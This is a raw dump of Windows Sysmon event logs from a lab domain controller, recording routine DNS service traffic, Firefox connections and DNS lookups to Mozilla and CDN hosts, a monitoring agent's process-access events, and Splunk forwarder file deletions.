12:30:37.096{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64410- 354300x800000000000000048416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.082{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65346- 354300x800000000000000048415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.080{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56496-false52.26.236.137ec2-52-26-236-137.us-west-2.compute.amazonaws.com443https 10341000x800000000000000048414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.710{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.710{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.710{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.709{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.709{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.709{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 354300x800000000000000048408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.075{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56497-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 354300x800000000000000048407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.070{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64410- 354300x800000000000000048406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.063{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65153- 354300x800000000000000048405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.060{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64517- 354300x800000000000000048404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.026{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62441- 354300x800000000000000048403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.023{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61045- 354300x800000000000000048402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.870{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56495-false23.33.22.142a23-33-22-142.deploy.static.akamaitechnologies.com80http 354300x800000000000000048401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.861{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60513- 354300x800000000000000048400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.861{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63653- 354300x800000000000000048399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.860{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62524- 354300x800000000000000048398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.858{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65350- 354300x800000000000000048397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.857{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local59292- 354300x800000000000000048396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.855{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56493-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x800000000000000048395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.842{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64269- 354300x800000000000000048394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.817{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56492-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 23542300x800000000000000048393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.361{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BB5055B3CFA756594F7BAC6AEEF3B1D,SHA256=4F4F733E90F4102F7597D9260873CA79FB0FEB363EC15C7E31D9765C757ACED8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.806{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56283- 354300x800000000000000048391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.805{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local65161- 354300x800000000000000048390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.799{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58234- 354300x800000000000000048389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.798{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58703- 354300x800000000000000048388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.778{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56491-false72.21.91.29-80http 354300x800000000000000048387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.777{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56490-false34.107.221.8282.221.107.34.bc.googleusercontent.com80http 354300x800000000000000048386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.768{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61328- 354300x800000000000000048385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.758{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local62850- 354300x800000000000000048384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.755{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64085- 354300x800000000000000048383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.673{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56488-false52.43.104.59ec2-52-43-104-59.us-west-2.compute.amazonaws.com443https 354300x800000000000000048382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.627{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64375- 354300x800000000000000048381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.614{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61266- 10341000x800000000000000048380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.241{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.241{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.241{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.225{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.225{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.225{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000048374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.168{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F4473D0A41442E7206532B9F6BA9AB,SHA256=EFA480972EA7C4FF13F93711F3E645F5F5363D3C3EA18EAFDF2F3F3D9C12DE6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000048373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.113{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.112{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.076{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.075{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.ingestion-edge.prod.dataops.mozgcp.net034.120.208.123;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.875{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.content-signature-chains.prod.webservices.mozgcp.net02600:1901:0:92a9::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.875{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304a1887.dscq.akamai.net02600:141f:4000:9::17ca:5a0e;2600:141f:4000:9::17ca:5a04;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.872{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.content-signature-chains.prod.webservices.mozgcp.net034.160.144.191;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.872{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304a1887.dscq.akamai.net023.33.22.139;23.33.22.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.871{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.33.22.142;::ffff:23.33.22.139;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.854{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.816{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.816{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.782{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 